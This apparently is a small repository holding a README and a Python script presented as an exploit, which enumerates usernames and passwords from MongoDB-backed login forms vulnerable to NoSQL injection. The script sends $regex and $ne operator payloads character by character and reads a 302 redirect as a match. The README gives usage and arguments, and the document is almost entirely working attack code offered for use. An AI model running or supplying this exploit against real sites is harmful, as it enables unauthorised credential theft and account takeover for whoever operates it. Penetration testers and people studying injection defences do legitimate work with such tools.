[
  {
    "path": "README.md",
    "content": "# Nosql injection username and password enumeration script\nUsing this script, we can enumerate usernames and passwords of NoSQL (MongoDB) injection-vulnerable web applications.\n<br /><br />\nExploit Title: Nosql injection username/password enumeration.<br />\nAuthor: Kalana Sankalpa (Anon LK).<br />\nWebsite: https://blogofkalana.wordpress.com/2019/11/14/nosql-injection-username-and-password-enumeration/<br />\n\n## How to run \n\n### Usage\n\n```\nnosqli-user-pass-enum.py [-h] [-u URL] [-up parameter] [-pp parameter] [-op parameters] [-ep parameter] [-sc character] [-m Method]\n```\n\n### Example\n\n```\npython nosqli-user-pass-enum.py -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit\n```\n\n### Arguments\n\n| Arguments        | Description           |\n| ------------- |:-------------:|\n| -h, --h      | show this help message and exit |\n| -u URL      | Form submission URL. Eg: http://example.com/index.php      |\n| -up parameter | Parameter name of the username. Eg: username, user      |\n| -pp parameter | Parameter name of the password. Eg: password, pass      |\n| -op parameters | Other parameters with their values. Separate each parameter with a comma (,). <br />Eg: login:Login, submit:Submit      |\n| -ep parameter | Parameter that needs to be enumerated. Eg: username, password      |\n| -m Method | Method of the form. Eg: GET/POST      |\n\n![alt test](screenshots/usage.png)\n\n![alt test](screenshots/run.jpg)\n\n![alt test](screenshots/result.png)\n"
  },
  {
    "path": "nosqli-user-pass-enum.py",
    "content": "# Exploit Title: Nosql injection username/password enumeration\n# Author: Kalana Sankalpa (Anon LK)\n# Websites: https://www.widane.com, https://blogofkalana.wordpress.com\n# Blogpost: https://blogofkalana.wordpress.com/2019/11/14/nosql-injection-username-and-password-enumeration/\n\n#!/usr/bin/python\nimport string\nimport requests\nimport argparse\nimport sys\nfrom colorama import Fore\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-u\", action='store', metavar=\"URL\", help=\"Form submission url. Eg: http://example.com/index.php\")\nparser.add_argument(\"-up\", action='store', metavar=\"parameter\", help=\"Parameter name of the username. Eg: username, user\")\nparser.add_argument(\"-pp\", action='store', metavar=\"parameter\", help=\"Parameter name of the password. Eg: password, pass\")\nparser.add_argument(\"-op\", action='store', metavar=\"parameters\", help=\"Other paramters with the values. Separate each parameter with a comma(,). Eg: login:Login, submit:Submit\")\nparser.add_argument(\"-ep\", action='store', metavar=\"parameter\", help=\"Parameter that need to enumerate. Eg: username, password\")\nparser.add_argument(\"-m\", action='store', metavar=\"Method\", help=\"Method of the form. Eg: GET/POST\")\nargs = parser.parse_args()\n\nif len(sys.argv) == 1:\n\tprint(parser.print_help(sys.stderr))\n\tprint(Fore.YELLOW + \"\\nExample: python \" + sys.argv[0] + \" -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit -m POST\")\n\texit(0)\nif args.u:\n\turl = args.u\nelse:\n\tprint(Fore.RED + \"Error: please enter URL with -u. 
\")\n\texit(0)\n\nif args.up:\n\tuserpara = args.up\nelse:\n\tprint(Fore.RED + \"Error: please enter User Parameter with -up.\")\n\texit(0)\n\nif args.pp:\n\tpasspara = args.pp\nelse:\n\tprint(\"Error: Fore.RED + please enter Password Parameter with -pp.\")\n\texit(0)\n\nif args.ep:\n\tif args.ep == args.up:\n\t\tpara1 = userpara\n\t\tpara2 = passpara\n\telif args.ep == args.pp:\n\t\tpara1 = passpara\n\t\tpara2 = userpara\n\telse:\n\t\tprint(Fore.RED + \"Error: please enter the valid parameter that need to enumarate\")\n\t\texit(0)\nelse:\n\tprint(Fore.RED + \"Error: please enter the Parameter that need to enumerate with -ep.\")\n\texit(0)\n\nif args.op:\n\totherpara = \",\" + args.op\nelse:\n\totherpara = \"\"\n\nif args.m is None:\n\tprint(Fore.RED + \"Warning: No method given. Using POST as the method. (You can give the method with -m)\")\n\t\ndef method(url, para):\n\tif args.m:\n\t\tif args.m[0] == \"p\" or args.m[0] == \"P\":\n\t\t\treturn requests.post(url, data=para, allow_redirects=False)\n\t\telif args.m[0] == \"g\" or args.m[0] == \"G\":\n\t\t\treturn requests.get(url, params=para, allow_redirects=False)\n\t\telse:\n\t\t\tprint(Fore.RED + \"Error: Invalid method\")\n\t\t\texit(0)\n\telse:\n\t\treturn requests.post(url, data=para, allow_redirects=False)\n\ncharacters = string.printable\nfor ch in string.printable:\n\t\n\tif ch in \"$^&*|.+\\?\":\n\t\tcharacters = characters.replace(ch, '')\nloop = True\nfinalout = \"\"\ncount = 0\n\nfor firstChar in characters:\n\tpara = {para1 + '[$regex]' : \"^\" + firstChar + \".*\", para2 + '[$ne]' : '1' + otherpara}\n\tr = method(url, para)\n\tif r.status_code != 302:\n\t\t\tprint(Fore.MAGENTA + \"No pattern starts with '\" + firstChar + \"'\")\n\t\t\tcontinue;\n\n\tloop = True\n\tprint(Fore.GREEN + \"Pattern found that starts with '\" + firstChar + \"'\")\n\tuserpass = firstChar\n\twhile loop:\n\t\tloop = False\n\n\t\tfor char in characters:\n\t\t\tpayload = userpass + char\n\t\t\tpara = {para1 + '[$regex]' : \"^\" 
+ payload + \".*\", para2 + '[$ne]' : '1' + otherpara}\n\t\t\tr = method(url, para)\n\t\n\t\t\tif r.status_code == 302:\n\t\t\t\tprint(Fore.YELLOW + \"Pattern found: \" + payload)\n\t\t\t\tuserpass = payload\n\t\t\t\tloop = True\n\n\tprint(Fore.GREEN + para1 + \" found: \"  + userpass)\n\tfinalout +=  userpass + \"\\n\"\n\tcount += 1;\n\nif finalout != \"\":\n\tprint(\"\\n\" + str(count) + \" \" + para1 + \"(s) found:\")\n\tprint(Fore.RED + finalout)\nelse:\n\tprint(Fore.RED + \"No \" + para1 + \" found\")\n\n\t\n\n"
  }
]